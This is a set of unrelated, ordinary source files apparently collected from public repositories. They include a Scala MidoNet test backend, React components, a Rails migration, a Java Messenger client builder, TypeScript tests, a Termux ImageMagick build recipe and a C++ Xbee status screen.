    // Convenience constructor: use a mocked CuratorFramework when none is given.
    def this() = {
        this(mock(classOf[CuratorFramework]))
    }

    // Single backing store shared by store / stateStore / stateTableStore.
    private val inMemoryZoom: InMemoryStorage = new InMemoryStorage()

    // Starts out CONNECTED so tests do not have to simulate a connection handshake.
    val connectionState =
        BehaviorSubject.create[ConnectionState](ConnectionState.CONNECTED)

    override def store: Storage = inMemoryZoom
    override def stateStore: StateStorage = inMemoryZoom
    override def stateTableStore: StateTableStorage = inMemoryZoom
    // No real state-table client or reactor in tests.
    override def stateTableClient: StateTableClient = null
    override def curator: CuratorFramework = curatorParam
    override def failFastCurator: CuratorFramework = curatorParam
    override def reactor: Reactor = null
    override def failFastConnectionState =
        connectionState.asObservable()
    override val discovery: MidonetDiscovery = new FakeDiscovery

    // Registers the in-memory state tables (MAC, ARP, peering, gateway, FIP64)
    // that production code expects, then reports the service as started.
    override def doStart(): Unit = {
        MidonetBackend.setupBindings(store, stateStore, () => {
            inMemoryZoom.registerTable(classOf[Topology.Network], classOf[MAC],
                                       classOf[UUID], MidonetBackend.MacTable,
                                       classOf[MacIdStateTable])
            inMemoryZoom.registerTable(classOf[Topology.Network], classOf[IPv4Addr],
                                       classOf[MAC], MidonetBackend.Ip4MacTable,
                                       classOf[Ip4MacStateTable])
            inMemoryZoom.registerTable(classOf[Router], classOf[IPv4Addr],
                                       classOf[ArpEntry], MidonetBackend.ArpTable,
                                       classOf[ArpStateTable])
            inMemoryZoom.registerTable(classOf[Topology.Port], classOf[MAC],
                                       classOf[IPv4Addr], MidonetBackend.PeeringTable,
                                       classOf[MacIp4StateTable])
            inMemoryZoom.registerTable(classOf[NeutronNetwork], classOf[UUID],
                                       classOf[AnyRef], MidonetBackend.GatewayTable,
                                       classOf[GatewayHostStateTable])
            inMemoryZoom.registerTable(classOf[NeutronNetwork], classOf[Fip64Entry],
                                       classOf[AnyRef], MidonetBackend.Fip64Table,
                                       classOf[Fip64StateTable])
        })
        notifyStarted()
    }

    override def doStop(): Unit = notifyStopped()
}
/** Factory shorthand for [[MidonetBackendTestModule]]. */
object MidonetBackendTestModule {
    def apply() = new MidonetBackendTestModule
}
/** Provides all dependencies for the new backend, using a FAKE zookeeper. */
class MidonetBackendTestModule(cfg: Config = MidoTestConfigurator.forAgents())
extends MidonetBackendModule(new MidonetBackendConfig(cfg), None,
new MetricRegistry) {
override protected def getCuratorFramework() =
mock(classOf[CuratorFramework])
override protected def failFastCuratorFramework() =
mock(classOf[CuratorFramework])
override protected def backend(curatorFramework: CuratorFramework,
failFastCurator: CuratorFramework,
isCluster: Boolean) = {
new MidonetTestBackend
}
}
|
import React from 'react';
// material ui
import { IconButton, TextField } from '@material-ui/core';
import { HighlightOff as HighlightOffIcon } from '@material-ui/icons';
import { Autocomplete } from '@material-ui/lab';
import Loader from '../common/loader';
const textFieldStyle = { marginTop: 0, marginBottom: 15 };
export default class FilterItem extends React.Component {
constructor(props, context) {
super(props, context);
this.state = {
key: props.filter.key, // this refers to the selected filter with key as the id
value: props.filter.value // while this is the value that is applied with the filter
};
}
componentWillUnmount() {
clearTimeout(this.timer);
}
componentDidUpdate(prevProps) {
if (Math.abs(prevProps.filters.length - this.props.filters.length) > 1) {
this.setState({ key: undefined, value: undefined });
}
if (this.props.filter.key && this.props.filter.key !== this.state.key) {
this.setState({ key: this.props.filter.key, value: this.props.filter.value });
}
}
shouldComponentUpdate(nextProps, nextState) {
if (nextProps.filter.key && nextProps.filter.key !== this.state.key) {
return true;
}
if (nextProps.filter.value && nextProps.filter.value !== this.state.value) {
return true;
}
if (nextProps.filters.length !== this.props.filters.length) {
return true;
}
if (nextProps.loading !== this.props.loading) {
return true;
}
return !(nextState.key === this.state.key && nextState.value === this.state.value);
}
updateFilterKey(value) {
const self = this;
if (!value) {
return self._removeFilter();
}
self.setState({ key: value }, () => (self.state.value ? self.props.onSelect(self.state) : null));
}
updateFilterValue(value) {
const self = this;
self.setState({ value }, () => self.notifyFilterUpdate());
}
notifyFilterUpdate() {
const self = this;
clearTimeout(self.timer);
self.timer = setTimeout(() => (self.state.key && self.state.value ? self.props.onSelect(self.state) : null), 300);
}
_removeFilter() {
this.setState({ key: undefined, value: undefined }, this.props.onRemove());
}
render() {
const self = this;
const { filterAttributes, filters, index, itemKey, loading } = self.props;
const { key, value } = self.state;
const selectedFilter = filterAttributes.find(filter => filter.key === key) || { key, value: key };
return (
<div className="flexbox" key={itemKey} style={{ alignItems: 'center' }}>
<div className="margin-right">Device matching:</div>
<Autocomplete
autoComplete
id={`filter-selection-${index}`}
freeSolo
filterSelectedOptions
groupBy={option => option.scope}
getOptionLabel={option => option.value || ''}
includeInputInList={true}
onChange={(e, changedValue) => self.updateFilterKey(changedValue ? changedValue.key : changedValue)}
options={filters.sort((a, b) => -b.scope.localeCompare(a.scope))}
renderInput={params => <TextField {...params} label="Attribute" style={textFieldStyle} />}
value={selectedFilter}
/>
<div className="margin-left-small margin-right">Equals</div>
<TextField
label="Value"
value={value || ''}
onChange={e => self.updateFilterValue(e.target.value)}
InputLabelProps={{ shrink: !!value }}
style={textFieldStyle}
/>
{!!self.state.key && (
<IconButton className="margin-left" onClick={() => self._removeFilter()} size="small">
<HighlightOffIcon />
</IconButton>
)}
<Loader show={loading} />
</div>
);
}
}
|
import "./style.css";
import React from "react";
import styled from "styled-components";
import Navbar from "./Navbar";
import { COLORS } from "../utils/constants";
import { H5, UnderlineSpan } from "../utils/typography";
const Footer = styled.footer`
width: 100%;
background-image: ${COLORS.primaryGradient};
display: flex;
justify-content: center;
padding: 1.8rem 0;
`;
const Layout = ({ children }) => {
return (
<>
<div>
<nav>
<Navbar />
</nav>
<main>{children}</main>
<Footer>
<H5>
Made with ❤ by{" "}
<UnderlineSpan
href="https://github.com/demic-dev"
target="_blank"
rel="noreferrer"
>
demic.dev
</UnderlineSpan>
</H5>
</Footer>
</div>
</>
);
};
export default Layout;
|
<reponame>PawelBanach/madmin
# Migration: creates the posts table with its user association and content columns.
class CreatePosts < ActiveRecord::Migration[6.0]
  def change
    create_table :posts do |t|
      t.belongs_to :user          # adds an indexed user_id column
      t.string :title
      t.integer :comments_count   # presumably a counter cache — confirm in the Post model
      t.json :metadata
      t.integer :state            # presumably backs an enum — confirm in the Post model
      t.timestamps
    end
  end
end
|
<filename>src/main/java/br/com/digidev/messenger4j/setup/MessengerSetupClientBuilder.java
package br.com.digidev.messenger4j.setup;
import br.com.digidev.messenger4j.common.MessengerHttpClient;
import br.com.digidev.messenger4j.internal.PreConditions;
/**
 * Fluent builder for {@link MessengerSetupClient} instances.
 *
 * <p>Usage: {@code new MessengerSetupClientBuilder(token).httpClient(custom).build()}.
 *
 * @author <NAME>
 */
public final class MessengerSetupClientBuilder {

    /** Page access token used to authenticate calls to the Messenger Platform. */
    final String pageAccessToken;

    /** Optional custom HTTP client; presumably the implementation supplies a default when left null — confirm in MessengerSetupClientImpl. */
    MessengerHttpClient httpClient;

    /**
     * Creates a builder for the given page access token.
     * The token is validated by {@code PreConditions.notNullOrBlank}.
     */
    public MessengerSetupClientBuilder(String pageAccessToken) {
        PreConditions.notNullOrBlank(pageAccessToken, "pageAccessToken");
        this.pageAccessToken = pageAccessToken;
    }

    /** Overrides the HTTP client used for platform requests; returns {@code this} for chaining. */
    public MessengerSetupClientBuilder httpClient(MessengerHttpClient messengerHttpClient) {
        this.httpClient = messengerHttpClient;
        return this;
    }

    /** Builds the configured {@link MessengerSetupClient}. */
    public MessengerSetupClient build() {
        return new MessengerSetupClientImpl(this);
    }
}
<gh_stars>1-10
import {
isContainer,
isContainerAND,
isContainerOR,
isContainerDefault,
isExpression,
isExpressionPassthrow,
isExpressionDefault,
isExpressionComparator,
isExpressionLocation,
Container,
EPassthrow,
EDefault,
EComparator,
EComparatorLocation,
ContainerAND,
ContainerOR,
ContainerDefault
} from './models';
test('check types should return the correct type', () => {
  // One fixture per container/expression variant; casts only set the shape,
  // the guards under test do the actual discrimination.
  const baseContainer = { model: 'CONTAINER' } as Container;
  const andContainer = { model: 'CONTAINER', type: 'AND' } as ContainerAND;
  const orContainer = { model: 'CONTAINER', type: 'OR' } as ContainerOR;
  const defaultContainer = { model: 'CONTAINER', type: 'DEFAULT' } as ContainerDefault;
  const passthrowExpr = { model: 'EXPRESSION', type: 'PASSTHROW' } as EPassthrow;
  const defaultExpr = { model: 'EXPRESSION', type: 'DEFAULT' } as EDefault;
  const comparatorExpr = { model: 'EXPRESSION', type: 'COMPARATOR' } as EComparator;
  const geoExpr = { model: 'EXPRESSION', type: 'GEO' } as EComparatorLocation;

  // Each guard must accept its own variant and reject an unrelated value.
  expect(isContainer(baseContainer)).toBe(true);
  expect(isContainer(passthrowExpr)).toBe(false);
  expect(isContainerAND(andContainer)).toBe(true);
  expect(isContainerAND(baseContainer)).toBe(false);
  expect(isContainerOR(orContainer)).toBe(true);
  expect(isContainerOR(baseContainer)).toBe(false);
  expect(isContainerDefault(defaultContainer)).toBe(true);
  expect(isContainerDefault(baseContainer)).toBe(false);
  expect(isExpression(baseContainer)).toBe(false);
  expect(isExpression(passthrowExpr)).toBe(true);
  expect(isExpressionPassthrow(passthrowExpr)).toBe(true);
  expect(isExpressionPassthrow(geoExpr)).toBe(false);
  expect(isExpressionDefault(defaultExpr)).toBe(true);
  expect(isExpressionDefault(geoExpr)).toBe(false);
  expect(isExpressionComparator(comparatorExpr)).toBe(true);
  expect(isExpressionComparator(geoExpr)).toBe(false);
  expect(isExpressionLocation(geoExpr)).toBe(true);
  expect(isExpressionLocation(passthrowExpr)).toBe(false);
});
|
<gh_stars>1-10
// Mailgun configuration, injected entirely from environment variables.
// All values are undefined when the corresponding variable is unset.
export default {
  apiKey: process.env.MAIL_GUN_API_KEY, // private API key
  domain: process.env.MAIL_GUN_DOMAIN,  // sending domain
  host: process.env.MAIL_GUN_HOST       // regional API host
}
# Termux build recipe for ImageMagick 7.
TERMUX_PKG_HOMEPAGE=https://www.imagemagick.org/
TERMUX_PKG_DESCRIPTION="Suite to create, edit, compose, or convert images in a variety of formats"
TERMUX_PKG_LICENSE="ImageMagick"
TERMUX_PKG_VERSION=7.0.10.41
# Upstream tags use "7.0.10-41", so the last dot of the version is rewritten to a dash.
TERMUX_PKG_SRCURL=https://github.com/ImageMagick/ImageMagick/archive/$(echo $TERMUX_PKG_VERSION | sed 's/\(.*\)\./\1-/').tar.gz
TERMUX_PKG_SHA256=54a220c6905f685d25697d37a089d3a821cc4ea2e9099bdac13e7e93661a0267
TERMUX_PKG_DEPENDS="fftw, fontconfig, freetype, fribidi, glib, harfbuzz, libandroid-support, libbz2, libcairo, libffi, libgraphite, libjpeg-turbo, liblzma, libpixman, libpng, librsvg, libtiff, libuuid, libwebp, libx11, libxau, libxcb, libxdmcp, libxext, libxml2, littlecms, openjpeg, pango, pcre, zlib"
# This package supersedes the old split -dev / -x packages.
TERMUX_PKG_BREAKS="imagemagick-dev, imagemagick-x"
TERMUX_PKG_REPLACES="imagemagick-dev, imagemagick-x"
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
--with-x
--without-gvc
--with-magick-plus-plus=no
--with-bzlib=yes
--with-xml=yes
--with-rsvg=yes
--with-lzma
--disable-openmp
ac_cv_func_ftime=no
"
TERMUX_PKG_RM_AFTER_INSTALL="
share/ImageMagick-7/francais.xml
"
termux_step_pre_configure() {
	if [ $TERMUX_ARCH = "i686" ]; then
		#Avoid "libMagickCore-7.Q16HDRI.so: error: undefined reference to '__atomic_load'"
		LDFLAGS+=" -latomic"
	fi
}
|
/* Copyright (c) 2021 Skyward Experimental Rocketry
* Author: <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#pragma once
#include <mxgui/display.h>
#include <cstdint>
#include <string>
#include <cstring>
#include "utils/testutils/ThroughputCalculator.h"
#include "../XbeeTestData.h"
#include "logger/Logger.h"
#include "utils/gui/GridLayout.h"
#include "utils/gui/OptionView.h"
#include "utils/gui/TextView.h"
#include "utils/gui/VerticalLayout.h"
using std::to_string;
/**
 * @brief Converts tick in milliseconds to the HH:MM:SS format.
 *
 * @param tick Duration in milliseconds (assumed non-negative).
 * @return Zero-padded "HH:MM:SS" string (hours may exceed two digits).
 */
// 'inline' added: this function is defined in a header, so without it every
// translation unit that includes the header would emit a duplicate symbol
// (ODR violation at link time). Also qualify std::string explicitly instead
// of relying on a transitive 'using namespace std'.
inline std::string tickToHMS(long long tick)
{
    char buf[15];
    // Peel off whole hours, then minutes; the remainder is seconds.
    int h = tick / (1000 * 3600);
    tick -= h * (1000LL * 3600);
    int m = tick / (1000 * 60);
    tick -= m * (1000 * 60);
    int s = tick / 1000;
    snprintf(buf, 15, "%02d:%02d:%02d", h, m, s);
    return std::string(buf);
}
/**
 * GUI status screen for the Xbee test: shows the selected configuration,
 * SD-logger health and live TX/RX statistics, plus two selectable buttons
 * ("Mark Log" / "Stop"). Widgets are laid out once in the constructor and
 * refreshed via the update*() methods.
 */
struct StatusScreen
{
    XbeeConfig config;

    // Builds the static view hierarchy: title bar, config grid, logger grid,
    // TX/RX data grid and button row, stacked vertically in `root`.
    StatusScreen()
    {
        title.setFont(mxgui::miscFixedBold);
        title.setTextColor(mxgui::black);
        title.setBackgroundColor(mxgui::green);
        title.setAlignment(HorizAlignment::CENTER, VertAlignment::CENTER);

        // Log status starts in the error style (white on red) until a log
        // file is confirmed by updateLogStatus().
        tv_log_status.setFont(mxgui::miscFixedBold);
        tv_log_status.setTextColor(mxgui::white);
        tv_log_status.setBackgroundColor(mxgui::red);
        tv_log_status.setAlignment(HorizAlignment::CENTER,
                                   VertAlignment::CENTER);
        grid_title.setCell(&title, 0, 0);
        grid_title.setCell(&tv_log_status, 0, 1);

        // Configuration grid: alternating label / value cells.
        grid_config.setCell(&tv_cfg_txt_tx_enabled, 0, 0);
        grid_config.setCell(&tv_cfg_tx_enabled, 0, 1);
        grid_config.setCell(&tv_cfg_txt_pkt_size, 0, 2);
        grid_config.setCell(&tv_cfg_pkt_size, 0, 3);
        grid_config.setCell(&tv_cfg_txt_snd_interval, 1, 0);
        grid_config.setCell(&tv_cfg_snd_interval, 1, 1);
        grid_config.setCell(&tv_cfg_txt_freq_hop, 1, 2);
        grid_config.setCell(&tv_cfg_freq_hop, 1, 3);
        grid_config.setCell(&tv_cfg_txt_data_rate, 2, 0);
        grid_config.setCell(&tv_cfg_data_rate, 2, 1);

        // Logger statistics grid.
        tv_log_title.setTextColor(mxgui::blue);
        grid_log_status.setCell(&tv_log_title, 0, 0);
        grid_log_status.setCell(&tv_log_txt_buf_written, 1, 0);
        grid_log_status.setCell(&tv_log_buf_written, 1, 1);
        grid_log_status.setCell(&tv_log_txt_buf_ttw, 1, 2);
        grid_log_status.setCell(&tv_log_buf_ttw, 1, 3);
        grid_log_status.setCell(&tv_log_txt_buf_dropped, 2, 0);
        grid_log_status.setCell(&tv_log_buf_dropped, 2, 1);
        grid_log_status.setCell(&tv_log_txt_buf_failed, 2, 2);
        grid_log_status.setCell(&tv_log_buf_failed, 2, 3);

        // TX statistics occupy the left half (columns 0-1) of the data grid.
        tv_tx_title.setTextColor(mxgui::blue);
        grid_data.setCell(&tv_tx_title, 0, 0);
        grid_data.setCell(&tv_tx_txt_num_pkt, 1, 0);
        grid_data.setCell(&tv_tx_num_pkt, 1, 1);
        grid_data.setCell(&tv_tx_txt_num_fail, 2, 0);
        grid_data.setCell(&tv_tx_num_fail, 2, 1);
        grid_data.setCell(&tv_tx_txt_pps, 3, 0);
        grid_data.setCell(&tv_tx_pps, 3, 1);
        grid_data.setCell(&tv_tx_txt_TTS, 4, 0);
        grid_data.setCell(&tv_tx_tts, 4, 1);
        grid_data.setCell(&tv_tx_txt_last_status, 5, 0);
        grid_data.setCell(&tv_tx_last_status, 5, 1);
        grid_data.setCell(&tv_tx_txt_last_err, 6, 0);
        grid_data.setCell(&tv_tx_last_err, 6, 1);

        // RX statistics occupy the right half (columns 2-3) of the data grid.
        tv_rx_title.setTextColor(mxgui::blue);
        grid_data.setCell(&tv_rx_title, 0, 2);
        grid_data.setCell(&tv_rx_txt_num_pkt, 1, 2);
        grid_data.setCell(&tv_rx_num_pkt, 1, 3);
        grid_data.setCell(&tv_rx_txt_num_fail, 2, 2);
        grid_data.setCell(&tv_rx_num_fail, 2, 3);
        grid_data.setCell(&tv_rx_txt_lost, 3, 2);
        grid_data.setCell(&tv_rx_lost, 3, 3);
        grid_data.setCell(&tv_rx_txt_RSSI, 4, 2);
        grid_data.setCell(&tv_rx_RSSI, 4, 3);
        grid_data.setCell(&tv_rx_txt_data_rate, 5, 2);
        grid_data.setCell(&tv_rx_data_rate, 5, 3);
        grid_data.setCell(&tv_rx_txt_pps, 6, 2);
        grid_data.setCell(&tv_rx_pps, 6, 3);
        grid_data.setCell(&tv_rx_txt_time_since_last_rx, 7, 2);
        grid_data.setCell(&tv_rx_time_since_last_rx, 7, 3);

        // Button row (both selectable so they can receive focus).
        btn_mark.setSelectable(true);
        btn_mark.setAlignment(HorizAlignment::CENTER,
                              VertAlignment::CENTER);
        btn_mark.setBackgroundColor(mxgui::darkGrey);
        btn_stop.setSelectable(true);
        btn_stop.setAlignment(HorizAlignment::CENTER, VertAlignment::CENTER);
        btn_stop.setBackgroundColor(mxgui::darkGrey);
        grid_buttons.setCell(&btn_mark, 0);
        grid_buttons.setCell(&btn_stop, 1);
        grid_buttons.setDrawBorder(true);

        // Vertical stacking; the numbers are relative size weights.
        root.addView(&grid_title, 0.8);
        root.addView(&grid_config, 1.5);
        root.addView(&grid_log_status, 1.5);
        root.addView(&grid_data, 5);
        root.addView(&grid_buttons, 1);
    }

    // Refreshes the configuration row with the user-selected values.
    void updateConfig(XbeeConfig cfg)
    {
        // Update GUI with selected config values
        tv_cfg_tx_enabled.setText(cfg.tx_enabled ? "Enabled" : "Disabled");
        tv_cfg_pkt_size.setText(std::to_string(cfg.packet_size));
        tv_cfg_snd_interval.setText(cfg.send_interval == 0
                                        ? "Cont"
                                        : std::to_string(cfg.send_interval));
        tv_cfg_freq_hop.setText(cfg.freq_hop ? "Enabled" : "Disabled");
        tv_cfg_data_rate.setText(cfg.data_rate_80k ? "80 kbps" : "10 kbps");
    }

    // Refreshes the SD-logger widgets. Error counters turn their cell red
    // once nonzero (the color is never reset back here).
    void updateLogStatus(Logger& logger)
    {
        LogStats stats = logger.getLogStats();
        if (logger.getLogNumber() >= 0)
        {
            // A valid log number means the SD card works: show the file name
            // in the "ok" style (black on green).
            string log_name = logger.getFileName(logger.getLogNumber());
            tv_log_status.setText(log_name);
            tv_log_status.setTextColor(mxgui::black);
            tv_log_status.setBackgroundColor(mxgui::green);
        }
        else
        {
            tv_log_status.setText("SD ERR");
            tv_log_status.setTextColor(mxgui::white);
            tv_log_status.setBackgroundColor(mxgui::red);
        }
        tv_log_buf_dropped.setText(to_string(stats.statDroppedSamples));
        if (stats.statDroppedSamples > 0)
        {
            tv_log_buf_dropped.setBackgroundColor(mxgui::red);
        }
        tv_log_buf_failed.setText(to_string(stats.statWriteFailed) + " (" +
                                  to_string(stats.statWriteError) + ")");
        if (stats.statWriteError != 0)
        {
            tv_log_buf_failed.setBackgroundColor(mxgui::red);
        }
        tv_log_buf_written.setText(to_string(stats.statBufferWritten));
        tv_log_buf_ttw.setText(to_string(stats.statWriteTime) + " ms");
    }

    // Refreshes TX/RX statistics from the latest throughput results,
    // per-direction counters and the raw Xbee status.
    void updateXbeeStatus(DataRateResult res_rcv, DataRateResult res_snd,
                          TxData txd, RxData rxd, Xbee::XbeeStatus xbee_status)
    {
        char str_buf[30];
        tv_tx_num_pkt.setText(
            to_string(txd.tx_success_counter + txd.tx_fail_counter));
        tv_tx_num_fail.setText(to_string(txd.tx_fail_counter));
        snprintf(str_buf, 30, "%.1f pkt/s", res_snd.packets_per_second);
        tv_tx_pps.setText(str_buf);
        tv_tx_tts.setText(to_string(txd.time_to_send) + " ms");
        tv_tx_last_status.setText(to_string(xbee_status.last_tx_status));
        tv_tx_last_err.setText(to_string(xbee_status.last_tx_status_error));
        tv_rx_num_pkt.setText(to_string(rxd.rcv_count));
        tv_rx_num_fail.setText(to_string(rxd.rcv_errors));
        // tv_rx_num_fail.setText(to_string(int_counter) + " " +
        // to_string(GpioATTN::value()));
        tv_rx_lost.setText(to_string(rxd.packets_lost));
        tv_rx_RSSI.setText(to_string(rxd.RSSI) + " dB");
        snprintf(str_buf, 30, "%.0f B/s", res_rcv.data_rate);
        tv_rx_data_rate.setText(str_buf);
        snprintf(str_buf, 30, "%.1f pkt/s", res_rcv.packets_per_second);
        tv_rx_pps.setText(str_buf);
        tv_rx_time_since_last_rx.setText(tickToHMS(miosix::getTick() - rxd.last_packet_timestamp));
    }

    VerticalLayout root{10};

    // Public value widgets (initialized with placeholder text, updated above).
    TextView tv_cfg_tx_enabled{"Disabled"};
    TextView tv_cfg_pkt_size{"256 B"};
    TextView tv_cfg_snd_interval{"Cont"};
    TextView tv_cfg_freq_hop{"Enabled"};
    TextView tv_cfg_data_rate{"10 kbps"};
    TextView tv_log_status{"SD ERR"};
    TextView tv_log_buf_dropped{"0"};
    TextView tv_log_buf_failed{"0 (0)"};
    TextView tv_log_buf_written{"0"};
    TextView tv_log_buf_ttw{"0 ms"};
    TextView tv_tx_num_pkt{"0"};
    TextView tv_tx_num_fail{"0"};
    TextView tv_tx_pps{"0 pkt/s"};
    TextView tv_tx_tts{"- ms"};
    TextView tv_tx_last_status{"0"};
    TextView tv_tx_last_err{"0"};
    TextView tv_rx_num_pkt{"0"};
    TextView tv_rx_num_fail{"0"};
    TextView tv_rx_lost{"0"};
    TextView tv_rx_RSSI{"-40 dB"};
    TextView tv_rx_data_rate{"0 B/s"};
    TextView tv_rx_pps{"0 pkt/s"};
    TextView tv_rx_time_since_last_rx{"00:00:00"};
    TextView btn_mark{"Mark Log (1)"};
    TextView btn_stop{"Stop"};

private:
    // Layout containers and static label widgets.
    TextView title{"Xbee Status"};
    GridLayout grid_title{1, 2};
    GridLayout grid_config{3, 4};
    GridLayout grid_buttons{1, 2};
    GridLayout grid_log_status{3, 4};
    GridLayout grid_data{8, 4};
    TextView tv_cfg_txt_tx_enabled{"TX"};
    TextView tv_cfg_txt_pkt_size{"Pkt size"};
    TextView tv_cfg_txt_snd_interval{"Interv"};
    TextView tv_cfg_txt_freq_hop{"Freq hop"};
    TextView tv_cfg_txt_data_rate{"Data rate"};
    TextView tv_log_title{"LOG"};
    TextView tv_log_txt_buf_dropped{"Buf drops"};
    TextView tv_log_txt_buf_failed{"Wrt fails"};
    TextView tv_log_txt_buf_written{"Wrt succ"};
    TextView tv_log_txt_buf_ttw{"TTW"};
    TextView tv_tx_title{"TX"};
    TextView tv_tx_txt_num_pkt{"Sent"};
    TextView tv_tx_txt_num_fail{"Fails"};
    TextView tv_tx_txt_pps{"PPS"};
    TextView tv_tx_txt_TTS{"TTS"};
    TextView tv_tx_txt_last_status{"Status"};
    TextView tv_tx_txt_last_err{"Last err"};
    TextView tv_rx_title{"RX"};
    TextView tv_rx_txt_num_pkt{"Recv"};
    TextView tv_rx_txt_num_fail{"Fails"};
    TextView tv_rx_txt_lost{"Lost"};
    TextView tv_rx_txt_RSSI{"RSSI"};
    TextView tv_rx_txt_data_rate{"DR"};
    TextView tv_rx_txt_pps{"PPS"};
    TextView tv_rx_txt_time_since_last_rx{"No RX dt"};
};
import clsx from 'clsx';
import { IconBaseProps } from 'react-icons';
import { Loader } from '../Loader';
import styles from './IconButton.module.scss';
export type IconBtnType = 'standard' | 'primary' | 'info' | 'error';
interface Props {
icon: React.ComponentType<IconBaseProps>;
btnType?: IconBtnType;
onClick: () => void;
loading?: boolean;
}
/**
 * Clickable icon wrapper: renders the given icon (or a loader while
 * `loading` is true) inside a styled, type-colored container.
 */
const IconButton = ({ icon: Icon, btnType = 'standard', onClick, loading = false }: Props) => {
  const containerClass = clsx(styles.icon_button, styles[btnType]);
  const content = loading ? <Loader /> : <Icon size={20} />;
  return (
    <div className={containerClass} onClick={onClick}>
      {content}
    </div>
  );
};

export default IconButton;
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.